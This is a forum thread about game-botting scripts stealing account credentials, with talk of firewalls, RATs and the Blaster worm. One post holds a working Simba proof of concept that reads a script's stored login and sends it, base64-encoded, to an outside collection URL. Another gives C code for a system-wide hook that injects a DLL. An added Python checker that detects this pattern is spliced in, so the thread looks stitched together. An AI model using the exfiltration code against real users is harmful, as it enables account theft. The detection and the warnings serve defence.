My script is safe, and if you are not sure you can read the code yourself.
A RAT regrows even after re-installing Windows, all you have to do is log in. JBD's are very easy you might have gone on a website, and there has been a silent one so you got infected without knowing it. No one should blame you hoodz, beautiful script right there is it possible for potions
The moment you go online, you are already exposed to viruses.
Please at least install some kind of firewall program, such as ZoneAlarm, that controls/blocks internet access from applications.
And if you are using some old version of Windows XP without a firewall on, you are immediately exposed to the Blaster worm (not sure if it still exists now).
Last edited by dzpliu; 04-19-2013 at 02:16 PM.
Looks like I need a firewall too, not sure about that Windows one
Last edited by t4q; 04-25-2013 at 11:46 AM.
I have never used a firewall and upon every Windows installation, I have disabled my firewalls.
I have not used an anti-virus/spyware in 6 years.
I have also never been hacked or received a virus, or had spyware/adware on any of my computers.
You just have to be smart about how you handle the internet: where you download stuff, what links you click, and whom you trust.
As an additional side note: yes, some scripters know very easy methods to take your account information for their own. And using ctrl+f "password" will not get you by all of them. I instead recommend using the Security Extension as it will ask permission any time a unique connection to the internet is made so you can verify it. (This will happen a ton in scripts either way, but it's the safest method when you don't know what to look for otherwise)
My Outdated Scripts: Edgeville Log Cutter | Edgeville AIO Jewelry | AIO Pickpocketer | Urn Activator | Slayer Tower | Slaying Kuradal
My Working Scripts:
Tutorials: Function Pointers and Why You Should Care! | Forms and Saving Settings | The Magic Behind Programming Tutorial | Recursive Recursion
Here is an example how account stealing could be achieved:
Simba Code:
```pascal
program AccountStealPoC;

procedure DeclarePlayers;
begin
  {HowManyPlayers := 1;
  NumberOfPlayers(HowManyPlayers);
  CurrentPlayer := 0;
  with Players[0] do
  begin
    Name := 'ExUsername';
    Pass := 'expassword';
    Nick := 'sern';
    Pin := '1234';
    Active := True;
  end;}
end;

procedure StealAccounts;
var
  FileHandle: Integer;
  Data: String;
begin
  FileHandle := OpenFile(ScriptPath + ScriptFile, False);
  ReadFileString(FileHandle, Data, FileSize(FileHandle));
  CloseFile(FileHandle);
  Data := Between(' := 0;', 'Active', Data);
  Writeln(GetPage('http://static.frement.net/srl/accountstealpoc/collect.php?d=' + Base64Encode(Data)));
end;

begin
  StealAccounts;
end.
```
There used to be something meaningful here.
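A static check for the pattern in the PoC above, as an added example that is not part of the original post or of Simba: it flags a script whose active code both reads its own script file and makes an HTTP request, which a search for "password" does not catch. The two sample scripts are constructed, the collector URL is a placeholder, and the identifier lists hold only names that appear in the PoC (an assumption about what to look for, not a complete list).

```python
import re

# Skip string literals first (a URL literal contains "//"), then { } and
# (* *) block comments, then // line comments.
_SKIP = re.compile(r"'(?:[^'\n]|'')*'|\{.*?\}|\(\*.*?\*\)|//[^\n]*", re.S)

# Identifiers taken from the PoC on this page; extend the tuples as needed.
NETWORK = ("getpage",)
SELF_REF = ("scriptpath", "scriptfile")
FILE_READ = ("openfile", "readfilestring")
ENCODERS = ("base64encode",)

# Constructed sample modelled on the PoC; the URL is a placeholder.
SAMPLE_POC = """
procedure DeclarePlayers;
begin
  {with Players[0] do begin Name := 'u'; Pass := 'expassword'; end;}
end;
procedure Report;
var F: Integer; Data: String;
begin
  F := OpenFile(ScriptPath + ScriptFile, False);
  ReadFileString(F, Data, FileSize(F));
  Writeln(GetPage('http://collector.example.invalid/c?d=' + Base64Encode(Data)));
end;
"""
# Constructed benign sample: the only "GetPage" is in a comment and a string.
SAMPLE_BENIGN = "begin // GetPage(x)\n  Writeln('GetPage is unused'); end."

def active_code(source):
    """Lower-cased source, comments removed, string literals emptied."""
    keep = lambda m: "''" if m.group(0).startswith("'") else " "
    return _SKIP.sub(keep, source).lower()

def _has(code, names):
    return any(re.search(r"\b" + n + r"\b", code) for n in names)

def audit(source):
    """Return (verdict, reasons) for one Simba script."""
    code = active_code(source)
    net = _has(code, NETWORK)
    self_read = _has(code, SELF_REF) and _has(code, FILE_READ)
    checks = [(net, "makes an HTTP request"),
              (self_read, "reads its own script file"),
              (_has(code, ENCODERS), "encodes data")]
    reasons = [msg for hit, msg in checks if hit]
    verdict = "high" if net and self_read else "review" if net else "none"
    return verdict, reasons
```

A "review" verdict only means the script talks to the network, which many legitimate scripts do; it marks the calls to read by hand.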
You know there is a firewall extension right?
You are lucky, I guess. I'm saying this because I experienced such things myself. Quite a few years back, when I was still using Windows XP or Windows 98 (can't remember which), my computer was infected with the Blaster worm immediately when I connected to the internet (via 56K modem) without antivirus/firewall on.
I can swear to you that in those days, I never even visited Google before I switched to broadband internet in 2006. This is because internet fees were pretty expensive back then using 56K connections, and I hardly even used my computers until I switched over to broadband. By then, I had already upgraded my desktop to a newer one with Windows XP.
Nowadays you don't face the problems I did back then because Windows XP SP1 onwards already patched the loopholes, even without a firewall on.
Good old days when you had to install a firewall before connecting to the internet.
Incorrect. As you said, you need a native language like C/C++/Asm etc. to achieve this. I suspect you don't know what RAT means, so in case you didn't know, it stands for Remote Access Tool, which in place can do anything the designer wishes. Doesn't have to be done in Java, can be done even with Pascal!
superuser is right, it is possible to do it that way. You can do a rootkit scan tho with some of the virus scanners that are out there.
Today is the first day of the rest of your life
Meh.. but I'm sure they'd go the lengths to write one that scans & spreads to other partitions. Most users would only format their current partition which they think has the virus and bam.. when they're done formatting, it spreads back lol. Pure evil! I would guess that it would only be able to spread back if the other partition contains an OS because it'd need Startup/Reg-run or installation as a service.
Also some users don't wipe the "System" partition that Windows-7 makes :l
Yeah. I haven't been on the "scene" for a long time and don't know for sure, but maybe it's still possible to overwrite e.g. MBR on hard-drives, which survives formatting as well.
Edit:
Hah, had to try something for the sake of good old times. I created a service which auto-starts and installs a system-wide CBT hook (and injects a DLL into each process). But, to my surprise, this is not possible out of the box anymore. Not at least in Windows 7, which is a good thing.
Code:
```c
#include <windows.h>
...
#pragma data_seg("Shared")
HHOOK g_hHook = NULL;
#pragma data_seg()

#ifdef __MYHOOK_EXPORTS
#define __MYHOOK_API __declspec(dllexport)
#else
#define __MYHOOK_API __declspec(dllimport)
#endif
...
LRESULT CALLBACK CBTProcedure(int nCode, WPARAM wParam, LPARAM lParam)
{
    if (nCode < 0)
        return CallNextHookEx(g_hHook, nCode, wParam, lParam);
    if (!hWnd)
        return 0;
    switch (nCode)
    {
        case HCBT_ACTIVATE:
            // e.g. register window with hHWnd..
            break;
        case HCBT_DESTROYWND:
            ...
            break;
    }
}

bool __MYHOOK_API InstallHook()
{
    g_hHook = SetWindowsHookEx(WH_CBT, (HOOKPROC)CBTProcedure, g_hInstance, 0);
    return g_hHook != NULL;
}

BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
        case DLL_PROCESS_ATTACH:
            ...
            break;
    }
    return TRUE;
}
```
I use the scripts you mentioned using..
Never ever had a problem with a "hacker" stealing my GPz through "zimba"
So I am not sure if someone else touched this topic with this approach. Please upload the script to Pastebin or PasteIt and message me the URL. I will check the script over and guess what... Mystery solved. Rather than trying to suggest ways of how it is possible, let's try to figure out if it was even true?
If by any chance you are willing to use Pastebin, feel free to send that URL to the mods and I.
We are all born ignorant, but one must work hard to remain stupid. - Benjamin Franklin